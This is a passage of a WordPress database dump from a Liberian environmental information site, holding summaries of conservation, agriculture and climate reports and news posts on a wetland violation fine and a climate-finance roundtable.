11:11:24','Liberia as party to the Convention on International Trade in Endangered Species (CITES) which requires signatories to protect certain species of wild flora and fauna, including timber species against illegal trade and to the Convention on Biological Diversity (CBD) which requires in-\r\nsitu conservation of ecosystems and natural habitats and the maintenance and recovery of viable populations of species in their natural surroundings','National Wildlife Conservation and Protected Area Management Law','','inherit','closed','closed','','2609-revision-v1','','','2022-12-06 11:11:24','2022-12-06 11:11:24','',2609,'https://ekmsliberia.info/?p=5237',0,'revision','',0),(5238,42,'2022-12-06 11:12:43','2022-12-06 11:12:43','This Annual Report represents activities of the Ministry of Agriculture for the year 2006 in support of Government’s effort to restore productive capacities in the agricultural sector. Because of its strategic role for employment creation, poverty reduction, food security and income generation, the Ministry prepared an interim policy document as a precursor for the formulation and promulgation of a Comprehensive Agricultural Development Policy and a National Agricultural Investment Strategy. With funding from the current fiscal budget, which was increased by over 250% from a five-year outlay of less than US$1 million to over US$3.2 million, the Ministry, among other things, began rehabilitating the Central Agricultural Research Institute (CARI) located in Bong County. As a result, nine New Rice of Africa (NERICA) varieties and four high yielding local varieties are under multiplication at CARI. Additionally, 19 elite IITA cassava cultivars are being multiplied at CARI and 241 IITA cassava genotypes are undergoing testing at CARI and in six other counties. Similarly, the Ministry began reactivating the national extension system, providing assistance to local initiatives such as the Kpein Seed Multiplication Project in Nimba County. While contributing to food security and poverty alleviation, these efforts are also helping reestablish government’s presence and visibility throughout the country.','Ministry of Agriculture ANNUAL REPORT 2006','','inherit','closed','closed','','3109-revision-v1','','','2022-12-06 11:12:43','2022-12-06 11:12:43','',3109,'https://ekmsliberia.info/?p=5238',0,'revision','',0),(5239,42,'2022-12-06 11:13:09','2022-12-06 11:13:09','A- Generalities and methods of biomonitoring program This report presents results from the biomonitoring program in 2015 in the Proposed GreboKrahn National Park (PGKNP), undertaken by survey team members from the Forestry Development Authority (FDA) and local communities, and with the supervision of the Wild Chimpanzee Foundation (WCF). Data was collected between the 26th February 2015 and the 17th of June 2015. A total of 249.32km of line transects were surveyed across the park, following the same systematic design from 2014. Data was collected on the signs of presence of large mammals, hunting and habitat disturbance (farming, mining, etc.). It was then analysed to determine the current status of wildlife and threats within the proposed park, as well as monitor their population trends.\n\nB- Abundance and spatial distribution of large mammals in Proposed Grebo-Krahn National Park (PGKNP) Two types of information were recorded: direct observations of large mammals and other animals and their indirect observations (dung, footprints, vocalizations, feeding sites and sleeping nests for chimpanzee...). Data was analysed to determine the encounter rates for each species and the spatial distribution of target species (chimpanzees, monkeys, duikers, etc.). A population estimate of chimpanzees was also calculated and provided the current estimate of 313 individuals. The data supports the idea of a stabilisation of the chimpanzee population as it is within the confidence limits of the 2014 population estimate. Some variation in distribution and encounter rates of other mammals have been documented but a longer time perspective is needed before confirming potential population trends. The isolated patch in the south of the park is an important area for biodiversity and endangered species and signs of wildlife along the Cavalla River have increased since the first phase of biomonitoring.\n\nC-Threats to wildlife of the PGNP The data collected on anthropogenic activities was treated in the same way as the wildlife data. Results seem do show a marked decrease in hunting activity, but these results must be treated with caution as the Ivorian border has been closed and there has been a ban on bush meat since the Ebola outbreak in Liberia. The expansion of Boley Village is now clearly having a negative effect of the wildlife in the horn in the north of the park. Chewing stick signs were still high within the park, but since the end of data collection law enforcement missions have taken place targeting chewing stick camps within PGKNP.\n\nD-Conclusion and Recommendations Though PGKNP still harbours high levels of biodiversity and hunting levels have decreased, FDA needs to remain vigilant that hunting pressures do not increase in a post-Ebola environment. The eviction of Boley Village must be a priority as the negative impact of hunting and farming in this settlement is having an effect on the distribution of wildlife in the north of the park. Continuing the process leading to the pre-gazettement of the park is essential in 2016 with activities such as boundary line flagging, community consultations, regional and national level meetings needed before the gazettement package can be submitted.','Biomonitoring in the Proposed Grebo-Krahn National Park REPORT ON PHASE 2','','inherit','closed','closed','','3092-autosave-v1','','','2022-12-06 11:13:09','2022-12-06 11:13:09','',3092,'https://ekmsliberia.info/?p=5239',0,'revision','',0),(5240,42,'2022-12-06 11:13:46','2022-12-06 11:13:46','This coastal zone’s Technology Needs Assessment for climate change adaptation in Liberia has been achieved through a tremendous collaborative effort by many institutions, affected and vulnerable coastal communities through stakeholders’ engagements, sites’ visits, documents and interviews with residents of coastal communities facilitated by the Environmental Protection Agency of Liberia (EPA) and the TNA. The institutions, communities and individuals mentioned in this report are duly acknowledged for their valuable contributions that successfully resulted to this report.','Coastal Zone\'s Technology Needs Assessment for Climate Change Adaptation','','inherit','closed','closed','','2993-revision-v1','','','2022-12-06 11:13:46','2022-12-06 11:13:46','',2993,'https://ekmsliberia.info/?p=5240',0,'revision','',0),(5241,42,'2022-12-06 11:14:02','2022-12-06 11:14:02','This assessment took place between March and June 2018, beginning with a desk review of data already available for the assessment site. Next, a gap analysis was conducted, and methodologies were developed. This was followed by field work to fill the identified gaps in order the to finalize the HCV assessment. This assessment followed the Liberian national HCV toolkit, developed by Fauna &amp; Flora International and Proforest in 2013, as a reference document to identify HCVs at a national level. This national toolkit follows the interpretations in the HCVRN guidance, and any deviations from these are noted clearly in this assessment.\r\n\r\nThe organisation commissioning this assessment is Fauna &amp; Flora International (FFI) Liberia, lead by Colin Pringle, Senior REDD+ Programme Manager. Contact: +447725594204, colin.pringle@faunaflora.org, The David Attenborough Building, Pembroke Street, Cambridge, UK, CB2 3QZ. Fauna &amp; Flora International was founded in 1903 and was the world’s first international wildlife conservation organization. Its mission is “to conserve threatened species and ecosystems worldwide, choosing solutions that are sustainable, based on sound science, and which take into account human needs”1. It is currently working on over 140 projects in over 40 countries worldwide.\r\n\r\nFFI has started working on REDD+ (Reducing emissions from deforestation and forest degradation) projects in Liberia and Myanmar to create a financial value for the carbon stored in their forests to use towards conservation activities. The REDD+ project in Liberia will provide gazettement of vital conservation habitats and sustainable forest management while integrating community incentives.','High Conservation Value Public Summary  Wonegizi Proposed Protected Area','','inherit','closed','closed','','3079-revision-v1','','','2022-12-06 11:14:02','2022-12-06 11:14:02','',3079,'https://ekmsliberia.info/?p=5241',0,'revision','',0),(5242,42,'2022-12-06 11:14:09','2022-12-06 11:14:09','This assessment took place between March and June 2018, beginning with a desk review of data already available for the assessment site. Next, a gap analysis was conducted, and methodologies were developed. This was followed by field work to fill the identified gaps in order the to finalize the HCV assessment. This assessment followed the Liberian national HCV toolkit, developed by Fauna &amp; Flora International and Proforest in 2013, as a reference document to identify HCVs at a national level. This national toolkit follows the interpretations in the HCVRN guidance, and any deviations from these are noted clearly in this assessment.\n\nThe organisation commissioning this assessment is Fauna &amp; Flora International (FFI) Liberia, lead by Colin Pringle, Senior REDD+ Programme Manager. Contact: +447725594204, colin.pringle@faunaflora.org, The David Attenborough Building, Pembroke Street, Cambridge, UK, CB2 3QZ. Fauna &amp; Flora International was founded in 1903 and was the world’s first international wildlife conservation organization. Its mission is “to conserve threatened species and ecosystems worldwide, choosing solutions that are sustainable, based on sound science, and which take into account human needs”1. It is currently working on over 140 projects in over 40 countries worldwide.\n\nFFI has started working on REDD+ (Reducing emissions from deforestation and forest degradation) projects in Liberia and Myanmar to create a financial value for the carbon stored in their forests to use towards conservation activities. The REDD+ project in Liberia will provide gazettement of vital conservation habitats and sustainable forest management while integrating community incentives.','High Conservation Value Public Summary  Wonegizi Proposed Protected Area','','inherit','closed','closed','','3079-autosave-v1','','','2022-12-06 11:14:09','2022-12-06 11:14:09','',3079,'https://ekmsliberia.info/?p=5242',0,'revision','',0),(5243,42,'2022-12-06 19:00:20','2022-12-06 19:00:20','This TNA’s second report, Barrier Analysis and Enabling Framework (BA&amp;EF) on Liberia’s coastal zone, assesses the potential barriers that could impede the transfer and diffusion of the technologies. As well, it provides an enabling framework or possible measures to overcome the identified barriers to the transfer and diffusion of the above technologies','Barrier Analysis & Enabling Framework for the Diffusion of Climate Change Coastal Zone’s Adaptation Technologies','','inherit','closed','closed','','3285-revision-v1','','','2022-12-06 19:00:20','2022-12-06 19:00:20','',3285,'https://ekmsliberia.info/?p=5243',0,'revision','',0),(5244,42,'2022-12-07 14:59:13','2022-12-07 14:59:13','This report focuses on the TNA process which was carried out in Liberia to identify and prioritize, through country-driven participatory processes, technologies for mitigation aimed at reducing the greenhouse gas (GHG) emissions in the country‟s energy sector.','Technology Needs Assessment Report Mitigation','','inherit','closed','closed','','3280-revision-v1','','','2022-12-07 14:59:13','2022-12-07 14:59:13','',3280,'https://ekmsliberia.info/?p=5244',0,'revision','',0),(5245,42,'2022-12-07 14:59:31','2022-12-07 14:59:31','This TNA report presents technology needs for adaptation in the agriculture sector. A multi-stakeholder process (MSP) has been adopted for the identification and prioritisation of technological options using a linear additive Multiple Criteria Analysis (MCA) framework. All relevant information for prioritising technologies was provided in Technology Fact Sheets. The criteria proposed by MCA4Climate were used in MCA, and indicators were defined by local stakeholders.','Technology Needs Assessment Agriculture Report','','inherit','closed','closed','','3282-revision-v1','','','2022-12-07 14:59:31','2022-12-07 14:59:31','',3282,'https://ekmsliberia.info/?p=5245',0,'revision','',0),(5246,42,'2022-12-07 15:01:28','2022-12-07 15:01:28','UN Framework Convention on Climate Change (UNFCCC), established from the Rio earth summit (1992) is about what can be done to reduce global warming and to cope with whatever temperature increases are inevitable.','Perspective of the UNFCCC','','inherit','closed','closed','','3249-autosave-v1','','','2022-12-07 15:01:28','2022-12-07 15:01:28','',3249,'https://ekmsliberia.info/?p=5246',0,'revision','',0),(5248,42,'2022-12-12 16:57:03','2022-12-12 16:57:03','In 2020, the EPA in consultation with the Ministry of Education (MOE) developed an “Environmental Awareness Curriculum/Modules for Secondary Schools in Liberia”. The decision for such an intervention was based on a realization that the pace of environmental education and awareness required additional catalyst the logic was, if the EPA succeeded in making environmental protection, education and awareness an issue, and a subject matter for schools, teachers, students and school administrators, they would become members of the global community advocacy teams. The first step was therefore to develop a user friendly curriculum that secondary school teachers would utilize for pedagogy to grades 10th through 12th.','ENVIRONMENTAL AWARENESS CURRICULUM  MODULES FOR  SECONDARY SCHOOLS IN LIBERIA','','publish','closed','closed','','environmental-awareness-curriculum-modules-for-secondary-schools-in-liberia','','','2022-12-12 16:57:03','2022-12-12 16:57:03','',0,'https://ekmsliberia.info/?post_type=document&#038;p=5248',27,'document','',0),(5249,42,'2022-12-12 16:54:47','2022-12-12 16:54:47','','Untitled','','inherit','open','closed','','untitled-21','','','2022-12-12 16:54:47','2022-12-12 16:54:47','',5248,'https://ekmsliberia.info/wp-content/uploads/2022/12/Untitled.png',0,'attachment','image/png',0),(5250,42,'2022-12-12 16:55:18','2022-12-12 16:55:18','','ENVIRONMENTAL AWARENESS CURRICULUM MODULES','','inherit','open','closed','','environmental-awareness-curriculum-modules','','','2022-12-12 16:55:18','2022-12-12 16:55:18','',5248,'https://ekmsliberia.info/wp-content/uploads/2022/12/ENVIRONMENTAL-AWARENESS-CURRICULUM-MODULES.pdf',0,'attachment','application/pdf',0),(5251,42,'2022-12-12 16:57:03','2022-12-12 16:57:03','In 2020, the EPA in consultation with the Ministry of Education (MOE) developed an “Environmental Awareness Curriculum/Modules for Secondary Schools in Liberia”. The decision for such an intervention was based on a realization that the pace of environmental education and awareness required additional catalyst the logic was, if the EPA succeeded in making environmental protection, education and awareness an issue, and a subject matter for schools, teachers, students and school administrators, they would become members of the global community advocacy teams. The first step was therefore to develop a user friendly curriculum that secondary school teachers would utilize for pedagogy to grades 10th through 12th.','ENVIRONMENTAL AWARENESS CURRICULUM  MODULES FOR  SECONDARY SCHOOLS IN LIBERIA','','inherit','closed','closed','','5248-revision-v1','','','2022-12-12 16:57:03','2022-12-12 16:57:03','',5248,'https://ekmsliberia.info/?p=5251',0,'revision','',0),(5253,42,'2023-01-18 16:39:22','2023-01-18 16:39:22','<!-- wp:paragraph -->\n<p>East International Group, the Chinese firm reconstructing the Robertsfield Highway, has acknowledged violating the Environmental Protection and Management Law (EPML) of Liberia and has apologized for the level of damage done to the Marshall Wetland in Margibi County.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The company vowed to restore the wetland it degraded by the building of a 2.0 km access road in the wetland in Marshall, Margibi County.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The Environmental Protection Agency (EPA) recently shut down Fengshou International, a rock quarry owned and operated by East International and Sino Liberia to illegally back-fill a portion of the Marshall Wetland in violation of the EPML and operational licenses issued to them by the EPA.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Marshall is one of Liberia’s wetlands of international importance under the Ramsar Convention, an international treaty signed and reached in 1971 in Ramsar, Iran to protect wetlands across the country.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>But, East International flouted the halt order and continuously back-filled the wetland, thus prompting a meeting with its CEO, Cao Yunfeug who has apologized to the EPA for the company’s defiant stance.  </p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In a letter of apology dated 11 January 2023, Mr. Cao said “we sincerely apologize for whatever violation we have done against the rules and regulations of the Environmental Protection Agency Laws of the Republic of Liberia.”</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>He also assured that the company will adhere to all environmental laws.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>“In this regard, East International Group, Inc. does hereby commit to the Government of Liberia through the Environmental Protection Agency that there will be a full and total restoration of the wetlands in line with the Ramsar Conventions following the completion of the Road Construction Project,” Mr. Cao said.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>However, the Agency has placed a US$ 150,000.00 fine on the company.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The Agency has also lifted the temporary halt order placed on Fengshou International, a rock quarry being used by East International and Sino Liberia.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The decision to lift the shutdown order follows a meeting with East International Group and the Ministry of Public Works on 12 January 2023.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>“Considering the critical nature of the RIA road construction work and as clarified by the Ministry of Public Works that your project relies primarily on Fengshou Rock Quarry and in the spirit of promoting sustainable development, the Agency thereby lifts the temporary shutdown order,” EPA Executive Director, Prof. Wilson K. Tarpeh said in a letter to lift the halt order.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>During the January 12 meeting, East International acknowledged violating the Environmental Protection and Management Law (EPML) of Liberia and apologized for the level of damage done to the Marshall Wetland in Margibi County.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The Agency also asked East International and Fenshou International to immediately halt all back-filling of the Marshall Wetland, including further expansion of their rock quarry.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The EPA also requested the Chinese companies to create an operational activities plan in addition to the existing environmental management plan to run the quarry and haul rock aggregates.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>East International uses the existing route which was being utilized before the back-filling and construction of the illegal haulage road.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>According to Prof. Tarpeh, the unauthorized back-filling and the alteration of the Marshall wetland is contrary to section 75 of the Environmental Protection and Management (EPML).</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>East International CEO, Mr. Cao promised to provide within a week, a comprehensive plan on how his firm will restore the degraded wetland following the completion of the RIA road project.</p>\n<!-- /wp:paragraph -->','East International Apologizes for Degrading Wetland & Vows To Restore It','','publish','open','closed','','east-international-apologizes-for-degrading-wetland-vows-to-restore-it','','','2023-01-18 16:39:25','2023-01-18 16:39:25','',0,'https://ekmsliberia.info/?p=5253',93,'post','',0),(5254,42,'2023-01-18 16:38:58','2023-01-18 16:38:58','','WhatsApp Image 2023-01-18 at 14.14.37 (1)','','inherit','open','closed','','whatsapp-image-2023-01-18-at-14-14-37-1','','','2023-01-18 16:38:58','2023-01-18 16:38:58','',5253,'https://ekmsliberia.info/wp-content/uploads/2023/01/WhatsApp-Image-2023-01-18-at-14.14.37-1.jpeg',0,'attachment','image/jpeg',0),(5255,42,'2023-01-18 16:39:22','2023-01-18 16:39:22','<!-- wp:paragraph -->\n<p>East International Group, the Chinese firm reconstructing the Robertsfield Highway, has acknowledged violating the Environmental Protection and Management Law (EPML) of Liberia and has apologized for the level of damage done to the Marshall Wetland in Margibi County.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The company vowed to restore the wetland it degraded by the building of a 2.0 km access road in the wetland in Marshall, Margibi County.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The Environmental Protection Agency (EPA) recently shut down Fengshou International, a rock quarry owned and operated by East International and Sino Liberia to illegally back-fill a portion of the Marshall Wetland in violation of the EPML and operational licenses issued to them by the EPA.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Marshall is one of Liberia’s wetlands of international importance under the Ramsar Convention, an international treaty signed and reached in 1971 in Ramsar, Iran to protect wetlands across the country.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>But, East International flouted the halt order and continuously back-filled the wetland, thus prompting a meeting with its CEO, Cao Yunfeug who has apologized to the EPA for the company’s defiant stance.  </p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In a letter of apology dated 11 January 2023, Mr. Cao said “we sincerely apologize for whatever violation we have done against the rules and regulations of the Environmental Protection Agency Laws of the Republic of Liberia.”</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>He also assured that the company will adhere to all environmental laws.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>“In this regard, East International Group, Inc. does hereby commit to the Government of Liberia through the Environmental Protection Agency that there will be a full and total restoration of the wetlands in line with the Ramsar Conventions following the completion of the Road Construction Project,” Mr. Cao said.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>However, the Agency has placed a US$ 150,000.00 fine on the company.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The Agency has also lifted the temporary halt order placed on Fengshou International, a rock quarry being used by East International and Sino Liberia.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The decision to lift the shutdown order follows a meeting with East International Group and the Ministry of Public Works on 12 January 2023.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>“Considering the critical nature of the RIA road construction work and as clarified by the Ministry of Public Works that your project relies primarily on Fengshou Rock Quarry and in the spirit of promoting sustainable development, the Agency thereby lifts the temporary shutdown order,” EPA Executive Director, Prof. Wilson K. Tarpeh said in a letter to lift the halt order.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>During the January 12 meeting, East International acknowledged violating the Environmental Protection and Management Law (EPML) of Liberia and apologized for the level of damage done to the Marshall Wetland in Margibi County.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The Agency also asked East International and Fenshou International to immediately halt all back-filling of the Marshall Wetland, including further expansion of their rock quarry.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The EPA also requested the Chinese companies to create an operational activities plan in addition to the existing environmental management plan to run the quarry and haul rock aggregates.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>East International uses the existing route which was being utilized before the back-filling and construction of the illegal haulage road.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>According to Prof. Tarpeh, the unauthorized back-filling and the alteration of the Marshall wetland is contrary to section 75 of the Environmental Protection and Management (EPML).</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>East International CEO, Mr. Cao promised to provide within a week, a comprehensive plan on how his firm will restore the degraded wetland following the completion of the RIA road project.</p>\n<!-- /wp:paragraph -->','East International Apologizes for Degrading Wetland & Vows To Restore It','','inherit','closed','closed','','5253-revision-v1','','','2023-01-18 16:39:22','2023-01-18 16:39:22','',5253,'https://ekmsliberia.info/?p=5255',0,'revision','',0),(5256,42,'2023-01-19 17:02:05','2023-01-19 17:02:05','<!-- wp:paragraph -->\n<p>The Government of Liberia through the Environmental Protection Agency (EPA) in collaboration with The Nature Compact (TNC) on Wednesday, 18 January 2023 commenced a three-day roundtable dialogue on Measuring Reporting Verification (MRV), Climate Finance and Governance in Margibi County.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The summit attracted officials from the EPA, along with national officials from other ministries, including the Forestry Development Authority (FDA), the Ministry of Mines and Energy (MME), the Ministry of Finance and Development Planning (MFDP), Liberia’s Institute of Statistics and Geo-Information Services (LISGIS), Ministry of Agriculture (MoA) and Ministry of Internal Affairs (MoI), non-governmental organizations and civil society organizations and institutions of higher learning.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The principal output of the three-day discussion is an ‘Evergreen Roadmap for Liberia’ that identifies specific objectives, priorities, proposed activities, outputs, and intended outcomes that will include strengthening multi-level climate governance and institutional arrangements in Liberia.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The roundtable dialogue also seeks to establish more efficient and effective climate MRV systems and mobilize investments and accelerates priority mitigation actions to achieve Liberia’s Nationally Determined Contribution (NDC).</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Speaking at the opening of the Evergreen Roundtable dialogue, EPA Executive Director, Prof. Wilson K. Tarpeh, lauded the Government of Canada for its support to Liberia.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>He recognized the importance of the bilateral support and said that there are lots of core elements associated with the MRV process- climate finance/climate investment and mitigation actions.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>According to Prof. Tarpeh, if Liberia must accede to Carbon Trading, then, MRV becomes critical.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>He said that the EPA recognizes the relevance of the Ministry of Finance and Development Planning in addressing environment and critical development needs.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Prof. Tarpeh disclosed that the EPA has adopted a motto: “One government, one people, one country, and one team, and explained that the EPA strongly believes that the Government of Liberia should always be involved from the formative to implementation stages of projects such as the Climate MRV bilateral support.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>He admonished participants to come up with a clear and detailed project framework for climate MRV.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>For her part, Lisa Marroquin, Novasphare Vice President and Program Director lauded the Government of Liberia for the bilateral support program with the Government of Canada.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>NovaSphere is a Canadian-based institution. The institution’s mission is to engage with stakeholders and create solutions to climate change and sustainability, by encouraging and promoting cooperation and collaboration among the public and organizations; gathering, creating and exchanging information with the public and organizations; performing research, including developing and managing research projects; developing and managing conferences, symposia, meetings, exhibitions and events; promoting the study of and providing training, support, development of governance and standards of practice and programmes.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>A day before the opening of the roundtable dialogue, Madam Marroquin and her team including Scott Muller had bilateral meetings with authorities of the EPA and the Ministry of Finance and Development Planning.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>She explained the success of the bilateral meetings and disclosed that the project would run for a period of three years and emphasized ‘this project is about implementation’.&nbsp;&nbsp; &nbsp;&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Also speaking at the opening of the program, the United Nations Convention on Climate Change (UNFCCC) national Focal Point for Liberia, Mr. Jefferson F. Nyandibo told participants that the roundtable meeting isn’t an ordinary workshop, but a gathering of some of the country’s brightest minds.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>He stressed the need for participants to use the roundtable to develop a roadmap to track climate finance.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Representing the Ministry of Finance and Development Planning at the seminar, Assistant Finance and Development Planning Minister Benedict Kolubah lauded EPA Executive Director Tarpeh and said through his leadership the issue of the Environment has been brought to the front burner as a critical development issue.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Minister Kolubah disclosed that the presidency has also shown immense interest in issues related to the environment and attributed it to Tarpeh’s stewardship.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>According to him, the Pro Poor Agency for Prosperity and Development (PAPD) has also outlined clearly the relevance of environmental issues to development.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>“There is a climate change unit underway to be established at the Ministry of Finance and Development Planning,” Assistant Minister Kolubah disclosed.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>He thanked the Canadian Government for its support to Liberia regarding the Climate MRV process.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Assistant Internal Affairs Minister, Abu-Bakr Bah explained that the impact of environmental degradation is quite visible in Liberia and requested the EPA and partners to support capacity building for urban cities to respond to climate change impacts.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Also speaking, Deputy Agriculture Minister, George Tee Forpoh stressed the need for the country to harness expertise to build an effective MRV system for Liberia.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>He promised that the Ministry of Agriculture will support Liberia’s drive to ensure that the country has an effective MRV process.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Assistant Mines and Energy, Johnson S. Willabo noted that Liberia holds a vast percentage of the upper Guinea Forest and disclosed that there are ongoing consultations and steps taken by the government to ensure that the forest is managed in a sustainable way to attract climate investments.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The three-day Evergreen Roundtable is expected to end on Friday, January 20,2023 with participant being able to described Liberia’s NDC target and the priority sectors for GHG mitigation actions; identified Liberia’s key challenges toward achieving the NDC and SDCs targets; understand the difference between MRV and GHG emissions, the MRV of Mitigation Actions and the MRV of Climate Finance; identified the key actors and their roles in achieving Liberia\'s NOC; designed and propose activities within the Evergreen Roadmap that strengthen Liberia\'s commitment and capacity to achieve the ND and related SD targets and; understand the roadmap in the development of the Liberia\'s MRV system and relevant MRV stakeholders.</p>\n<!-- /wp:paragraph -->','Liberia Hosts Three-Day Round-Table Dialogue On Climate Finance, Governance, and Measuring Reporting Verification','','publish','open','closed','','liberia-hosts-three-day-round-table-dialogue-on-climate-finance-governance-and-measuring-reporting-verification','','','2023-01-19 17:02:08','2023-01-19 17:02:08','',0,'https://ekmsliberia.info/?p=5256',92,'post','',0),(5257,42,'2023-01-19 16:59:33','2023-01-19 16:59:33','<!-- wp:paragraph -->\n<p>The Government of Liberia through the Environmental Protection Agency (EPA) in collaboration with The Nature Compact (TNC) on Wednesday, 18 January 2023 commenced a three-day roundtable dialogue on Measuring Reporting Verification (MRV), Climate Finance and Governance in Margibi County.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The summit attracted officials from the EPA, along with national officials from other ministries, including the Forestry Development Authority (FDA), the Ministry of Mines and Energy (MME), the Ministry of Finance and Development Planning (MFDP), Liberia’s Institute of Statistics and Geo-Information Services (LISGIS), Ministry of Agriculture (MoA) and Ministry of Internal Affairs (MoI), non-governmental organizations and civil society organizations and institutions of higher learning.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The principal output of the three-day discussion is an ‘Evergreen Roadmap for Liberia’ that identifies specific objectives, priorities, proposed activities, outputs, and intended outcomes that will include strengthening multi-level climate governance and institutional arrangements in Liberia.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The roundtable dialogue also seeks to establish more efficient and effective climate MRV systems and mobilize investments and accelerates priority mitigation actions to achieve Liberia’s Nationally Determined Contribution (NDC).</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Speaking at the opening of the Evergreen Roundtable dialogue, EPA Executive Director, Prof. Wilson K. Tarpeh, lauded the Government of Canada for its support to Liberia.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>He recognized the importance of the bilateral support and said that there are lots of core elements associated with the MRV process- climate finance/climate investment and mitigation actions.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>According to Prof. Tarpeh, if Liberia must accede to Carbon Trading, then, MRV becomes critical.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>He said that the EPA recognizes the relevance of the Ministry of Finance and Development Planning in addressing environment and critical development needs.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Prof. Tarpeh disclosed that the EPA has adopted a motto: “One government, one people, one country, and one team, and explained that the EPA strongly believes that the Government of Liberia should always be involved from the formative to implementation stages of projects such as the Climate MRV bilateral support.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>He admonished participants to come up with a clear and detailed project framework for climate MRV.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>For her part, Lisa Marroquin, Novasphare Vice President and Program Director lauded the Government of Liberia for the bilateral support program with the Government of Canada.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>NovaSphere is a Canadian-based institution. The institution’s mission is to engage with stakeholders and create solutions to climate change and sustainability, by encouraging and promoting cooperation and collaboration among the public and organizations; gathering, creating and exchanging information with the public and organizations; performing research, including developing and managing research projects; developing and managing conferences, symposia, meetings, exhibitions and events; promoting the study of and providing training, support, development of governance and standards of practice and programmes.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>A day before the opening of the roundtable dialogue, Madam Marroquin and her team including Scott Muller had bilateral meetings with authorities of the EPA and the Ministry of Finance and 